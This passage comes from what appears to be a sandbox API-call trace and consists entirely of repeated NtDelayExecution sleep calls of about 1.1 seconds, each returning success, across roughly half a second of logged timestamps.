(Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.707] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.708] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.710] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.711] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.713] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.714] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.716] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.717] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.719] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.720] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.722] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.723] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.725] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.727] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.728] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.730] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.731] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.733] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.734] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.736] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.737] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.739] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.740] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.742] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.743] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.745] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.746] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.748] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.750] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.752] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.753] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.755] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.756] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.758] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.759] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.761] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.763] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.764] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.766] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.767] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.769] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.770] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.772] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.773] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.776] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.777] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.779] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.780] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.782] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.783] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.785] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.786] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.788] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.790] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.791] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.793] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.794] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.796] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.797] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.799] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.800] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.802] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.803] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.806] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.808] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.809] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.811] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.812] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.814] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.815] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.817] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.818] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.821] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.822] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.824] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.826] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.827] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.829] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.830] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.832] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.833] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.835] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.836] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.839] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.841] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.842] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.844] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.845] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.847] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.848] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.850] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.851] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.853] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.857] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.858] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.859] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.861] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.862] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.864] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.865] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.867] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.868] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.870] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.871] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.873] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.875] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.876] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.878] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.879] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.881] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.882] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.884] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.885] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.887] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.888] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.890] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.891] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.893] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.894] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.897] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.899] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.900] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.902] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.903] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.908] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.909] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.911] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.912] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.914] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.915] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.920] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.921] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.922] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.924] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.926] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.927] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.929] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.930] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.932] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.933] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.935] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.936] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.938] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.939] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.943] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.944] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.946] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.947] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.949] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.950] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.952] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.953] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.955] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.956] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.958] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.959] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.961] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.962] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.964] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.968] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.970] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.971] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.973] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.974] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.976] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.977] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.979] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.981] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.982] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.984] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.985] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.987] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.988] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.992] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.993] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.994] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.996] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.997] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0151.999] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.000] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.002] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.003] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.005] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.006] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.008] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.009] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.011] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.012] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.014] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.018] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.020] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.021] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.023] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.024] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.027] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.028] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.029] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.031] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.033] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.034] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.036] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.037] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.039] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.040] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.042] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.045] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.046] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.048] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.049] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.051] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.052] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.054] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.055] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.057] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.058] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.060] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.061] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.063] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.064] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.066] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.067] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.069] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.073] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.074] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.076] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.077] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.079] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.080] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.082] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.083] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.085] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.086] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.088] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.089] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.091] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.092] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.094] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.095] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.097] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.098] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.103] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.104] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.106] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.107] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.109] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.110] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.112] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.113] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.115] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.116] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.118] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.119] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.121] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.122] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.124] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.125] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.128] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.129] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.130] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.132] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.133] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.135] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.136] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.138] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.139] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.141] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.142] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.144] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.145] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.147] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.148] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.150] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.151] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.153] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.154] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.156] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.157] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.159] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.176] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.177] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.178] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.180] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.181] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.183] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.184] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.186] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.187] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.189] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.190] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.192] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.196] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.197] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.198] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.200] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.201] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.203] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.204] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.206] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.207] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.209] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.210] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.212] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.213] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.215] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.216] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.218] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.219] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.221] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.230] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.231] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.233] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.234] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.236] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.237] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.239] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.240] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.242] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.243] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.245] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.246] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.248] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.249] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.251] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.252] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.254] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.255] NtDelayExecution 